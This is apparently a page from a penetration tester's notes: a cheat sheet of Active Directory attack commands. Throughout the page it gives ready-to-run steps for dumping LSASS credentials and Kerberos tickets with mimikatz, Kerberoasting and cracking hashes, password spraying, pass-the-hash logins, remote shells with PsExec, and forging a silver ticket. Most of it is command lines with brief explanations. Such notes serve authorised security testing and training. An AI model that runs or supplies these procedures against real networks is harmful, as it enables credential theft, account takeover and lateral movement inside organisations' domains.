All Commands, Tools & Scripts

Here is a collection of commands, tools and scripts that you can use through the exploitation of an active directory.

There are 2 popular versions of mimikatz tool that work with different versions of Windows. Mimikatz - 2.1.1 and 2.2.0. I am yet to figure out the compatible versions and once I have them figured I will list it out here. Until then, if you get an error while trying to list passwords and tickets, then switch versions and try it out.

List of users & groups within the local system
net user
net group
List of users and groups within the domain

In order to be able to list the users and groups from the domain, you should be logged in as a user of that domain.

net user /domain
net group /domain
Details about a user - password profile, groups, etc.
net user alice /domain
List of users and their attributes

https://github.com/SisyphusP42/vapt/blob/main/Windows_Users%26Attributes

List of Logged in users

Powerview script from github to list logged in users. 

Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName p42176 #for locally logged in users
Get-NetSession -ComputerName p42 #for domain logged in users

Alternatively, PsLoggedon executable can be used to retrieve the list when Powerview does not work due to permissions,

.\PsLoggedon.exe \\systemname
List of SPNs in the domain

Service Principle Names are names given to services that are hosted from within the domain. Enumerating them will us the IP address and Port of those services along with a list of other details.

The same script used for enumerating users and attributes can be used for SPNs with a slight modification.

Change the $Search.filter="samAccountType=805306368" to $Search.filter="serviceprincipalname=*http*"

Alternatively the Get-SPN script can also be used. 

Get-SPN -type service -search "*http*"

The native Windows tool setspn can also be used to get the list of SPNs,

setspn -L iis_service
Retreive User Password Hash from LSASS

We will use mimikatz executable to retrieve the password hashes and you need to have at least local administrator privilege to get the passwords,

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
List local users and NTLM Hash

This command can be used to list the local users along with their NTLM hash. This is all the more useful once you gain access to a domain controller to list all users belonging to that domain.

mimikatz.exe
privilege::debug
lsadump::lsa /patch
Retrieve TGT and TGS of Users & Services

The TGT and TGS of logged in users are stored in the LSASS.

mimikatz.exe
privilege::debug
sekurlsa::tickets
Export TGS to the drive & Crack it

We can export the TGS to the drive and then use John or Hashcat to crack the file. The mimikatz procedure is as follows, you will need to the know the SPN to retreive its ticket.

#Powershell Commands
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/p42http.p42.com'

#Mimikatz tool
mimikatz.exe
privilege::debug
kerberos::list /export

Once the ticket is exported, it can be cracked using tgsrepcrack,

python /usr/share/kerberoast/tgsrepcrack.py rockyou.txt HTTP~p42http.p42.com-CORP.COM.kirbi

Invoke-Kerberoast

Invoke kerberoast is a powershell script that takes care of identifying SPNs and exporting the kirbi files end-to-end. 

Invoke-Kerberoast -OutputFormat hashcat | fl

Once you have the file in hashcat format, the file can be cracked using hashcat,

hashcat -m 13100 -a 0 cracked.txt file.kirbi /usr/share/seclists/Passwords/Common-Credentials/file.txt
Slow User Password Guessing

One of the ways, though not the most effective, is to attempt logins with passwords to guess. We can automate this process using powershell scripts. However one thing to be kept in mind is number of wrong passwords before which an account will be locked. We can find it by,

net accounts

Lockout Threshold and Lockout Observation windows are 2 parameters to keep in mind before starting this attack.

We can use the DomainPasswordSpray script to try and guess the user password,

Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Spring2017

Windows Login with NTLM Hash

This works only with NTLM hash on AD admin accounts and built in local admin accounts. This is merely a replacement for instead of logging in with passwords. 

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.1 cmd
Use user NTLM Hash to open application

This works when you have another user logged on to the system using NTLM and would like to start an application in that user's context. Here we will get a powershell ticket and open the powershell application.

Ensure that a user already has a session using NTLM and get the password hash as shown under the section "Retreive User Password Hash from LSASS"

Then use the following code to get a Kerberos ticket for powershell

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:p42.com /ntlm:e2b475c31da2a5738190f67ae965c227 /run:PowerShell.exei

With this you should have a powershell open within the context of the user "administrator".

Generate TGT & TGS using Powershell Opened within User's Context

If you already have an powershell application open within the user's context, then you can request for a TGT and use it to further your attack. The following command is to authenticate to a network share,

net use \\p42

Note: Any command that seeks the permission of the DC can be used here.

You can check the generated ticket using the command "klist".

Open a Cmd Prompt on a Remote System

In order to be able to open a command prompt on a remote system within the context of a user, you should already have a powershell/cmd prompt in that users context in the local system. Then, the tool PsExec.exe can be used to open the remote prompt. 

.\PsExec.exe \\p42 -c cmd.exe -u <domainname\username> -p <password>

It is important to note that some systems accept only domain name and the same has to be included in the command instead of the IP address or loopback address.

Open a Cmd Prompt from the Linux System

This is Linux equivalent of the PsExec on Windows. This comes in handy when you have the username and password to gain command prompt control on a remote system. This requires the target machine to have SMB and write access to Admin$ share. 

psexec.py p42/user123:hereisapassword@192.168.1.1

It is important to note that some systems accept only domain name and the same has to be included in the command instead of the IP address or loopback address.

Crafting a Silver Ticket in Kerberos

A silver ticket is a service ticket that is crafted by the user instead of the TGT. We will need the password hash of the service account that runs the service and Service ID (SID) of the user domain.

SID can viewed using the following command,

whoami /user

Then the ticket can be crafted using mimikatz,

mimikatz.exe
kerberos::purge
kerberos::list
kerberos::golden /user:user1 /domain:p42.com /sid:S-1-5-21-1602849587-2789273131-2649389668 /target:httpserver.p42.com /service:HTTP /rc4:E2B4748C11DA2A07DH92749W87A992C917 /ptt

The rc4 parameter is to indicate the encryption algorithm to be used and the value is the key to the encryption, which here is the NTLM hash of that service account. The NTLM hash can be procured for the SPN by requesting a service ticket and then cracking it. Check out the "Export TGS to the drive and crack it" section.

PreviousPowerShell RemotingNextUsing Crackmapexec

Last updated